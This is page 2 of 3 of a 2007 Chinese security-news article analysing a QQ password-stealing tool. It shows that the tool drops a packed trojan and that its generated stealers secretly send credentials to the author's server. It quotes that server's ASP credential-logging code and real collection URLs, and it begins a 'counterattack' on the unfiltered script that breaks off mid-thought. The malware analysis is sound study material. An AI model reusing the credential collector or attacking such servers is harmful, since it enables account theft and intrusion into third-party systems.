星际网域
当前位置:网站首页>安全资讯>黑客技术>文章内容
找出安全漏洞 QQ盗号软件分析与反击
来源:华军资讯 作者:星际网域 发布时间:2007-11-29


  今天无聊给一朋友讲解QQ盗取原理,从网上找了一个工具 “明小子QQ密码特工”结果发现这个软件有后门。下面就让我带着大家来分析一下。

  首先我们用nod32来查一下有没有毒。图1

  看到了吧没有病毒。我们把监控打开在运行看看图2

  看到了吧 NOD32检测到了病毒。为了确认一下。我再用‘木马辅助查找器’的文件监视功能来检测下。图3

        新建 C:\Documents and Settings\Administrator\Local Settings\Temp\IXP003.TMP\123.exe

  很明显软件本身在运行的同时释放了一个123.exe 而NOD32查杀到的也就是这个文件。

  C:\Documents and Settings\Administrator\Local Settings\Temp\IXP003.TMP\

  接着我们用peid查下123.exe. 图4

  EP段.nsp1经常搞免杀的应该知道这是北斗加的壳,我们再看看区段vmp 图5

  这个一看就是用vmprotect做的免杀。至于123.exe是什么木马咱门就不继续分析了。

  接下来分析他生成后的文件是不是一样令人担忧。

  随便配置一个图6

  Ollydbg手工给他脱壳esp定律简单 图7

  脱壳成功后我们在用PEID检测下 图8

     我们再用c32asm对他进行反汇编,搜索asp图9

  看到了什么 .刚才我是默认设置的应该是http://k.thec.cn/xieming/69q/qq.asp才对。,怎么会是http://langyeqq.cn/qq/newbacka.asp 这个呢!我们浏览看看 图10

  "pzQQ"看到了吧,说明就是他的盗号的,从这些可以确定,这个软件不但运行的时候施放一个木马,而且就连我们配置好的文件也被他留了后门,而作者就坐等着收号了。

  后门反击战 作者:fhod

  看到这..想必大家也和我一样非常生气..难道我们就任由作者下去吗.当然不..现在我们就开始反击.

  我们来看看qq.asp的代码

  首先来看

  strLogFile="Q7.txt"

  这个是QQ接受文件..默认的是q7.txt

  继续看代码

QQNumber=request("QQNumber")

QQPassWord=request("QQPassWord")

QQclub=request("QQclub")

QQip=request("QQip")

  是没经过任何过滤的..这些参数的数据我们完全可以自定义

  在往下看

if QQNumber="" or QQPassWord="" then

response.write "pzQQ"

response.end

  假如QQNumber和QQPassWord的值为空就返回pzQQ .然后程序结束工作.. 只要这两个值不为空就继续执行下面的代码

StrLogText =StrLogText&QQNumber&"----"&QQPassWord&"----会员:"& QQclub&"----IP:"&QQip&"("&request.servervariables("REMOTE_HOST")

StrLogText=StrLogText&")"      写入q7.txt文件

  格式为 QQ号码----QQ密码----会员:----IP:

  继续看下面的代码

set f=Server.CreateObject("scripting.filesystemobject") (没有q7.txt这个文件就自动新建)

set ff=f.opentextfile(server.mappath(".")&"\"&strLogFile,8,true,0)

ff.writeline(StrLogText) (打开q7.txt并写入数据)

  最后response.write "发送成功!" 满足条件提示成功.

  所有的代码也就是这些..程序并未做任何过滤..和处理..也就是说..只要满足qq.asp?QQNumber=123&QQPassWord=123 就回返回 "发送成功!"的提示.

  http://www.ciker.org/soft/qq.asp?QQNumber=123&QQPassWord=123图11

  这就证实了QQNumber=123&QQPassWord=123这两个我们是可以自己定义的..假如我们写入的不是数字



共3页: 上一页 1 [2] [3] 下一页
Tags:分析 反击 软件 找出 我们 .. QQNumber 代码 文件 可以

(阅读次数: 次)


星际网域免责声明:本网站转载纯粹出于为网民传递更多信息之目的,无任何商业目的。如本网站转载稿件涉及版权等问题,请作者在两周内速来电或来函星际网域 web#okeve.com 联系,在此,我们首先向您表示诚挚的歉意,并将尽快予以改正。本网站上发表的内容只代表作者本人之观点,本网站只出于传递更多信息之目的,并不意味着赞同其观点或证实其内容的真实性。
[收藏] [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]
用户名: 新注册) 密码: 匿名评论 [所有评论]
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
最新评论:
推荐文章
·利用Windows缺陷代码 未现蠕虫攻击
·新型黑客攻击改变战术 目标对准敏感数据
·新手学堂:分享骇客技术的七大秘籍
·知己知彼百战不殆 木马病毒的发展史
·博客中国首页被人涂改 黑客留字威胁(图)
·无处可逃 小编带你揭开DLL木马神秘面纱
·教你黑客是怎样侦察和隐藏IP地址的
·黑客技术分析 会话劫持攻击实战详解
·网页“黑手”如何攻击你的Windows系统
·黑客知识 彻底堵死SQL注入工具漏洞
·技术讲解 实战黑客网络攻击的预防措施
·黑客经验谈之黑客所应有的基本技能
·多图详解:入侵国内某知名网站记录
·网络孙子兵法 黑客攻防也有三十六计
·“网络钓鱼”到底如何钓走你的钱
热点文章
·新手十三步轻松就能学会入侵个人电脑
·经典教程 初级黑客安全技术命令详解
·看看黑客如何给你的系统种上木马!
·教你黑客是怎样侦察和隐藏IP地址的
·新人零起步接触黑客─网站入侵基本知识
·知己知彼 先看恶意程序是怎样写成的
·黑客盗号再出新招 让用户自己泄露密码
·愚公移山常见实用文档密码之暴力破解
·黑客攻击彻底揭密:分析选定网络攻击
·入侵技巧:通过“鼠洞”控制你的计算机
·新手学堂:分享骇客技术的七大秘籍
·黑客技巧之手把手教你轻松破解网吧!
·攻防实战 入侵邻居MM家的无线路由器
·如何入侵装有SQL数据库的电脑主机(图)
·揭密黑客网络入侵的十四种实用方法!
相关文章
·网页“黑手”如何攻击你的Windows系统
·看黑客如何发动对电子邮件系统的攻击
·黑客讲述真实经历:我如何侵入医院电脑
·用SockOnline软件轻松突破端口限制
·黑客基础知识 常用命令和快捷键大全
·技巧:黑客眼中安全防范的 四大利器
·完整的XSS wrom网站入侵实例示范
·一分钟破解Windows系统开机密码
·系统防御战:黑客网络攻击的预防措施
·接入节点入手 谈黑客和DDOS攻击防御
·黑客探取密码原理制定相应防范措施
·ADSL Modem防黑客攻击 修炼秘技
·电信IP网建立防范黑客攻击安全防范策略
·安全专家支招防范黑客攻击九大方法
·安全基础 如何看电脑是否被木马攻击
网站地图 | 友情链接 | 版权声明 | 高级搜索 | 发表文章 | 留言反馈 | 本站论坛 | 服务 | 关于我们 | RSS订阅
Copyright(C)2005-2008 okeve.com All rights reserved.
推荐使用1024*768以上分辨率来浏览本站
湘ICP备07501566号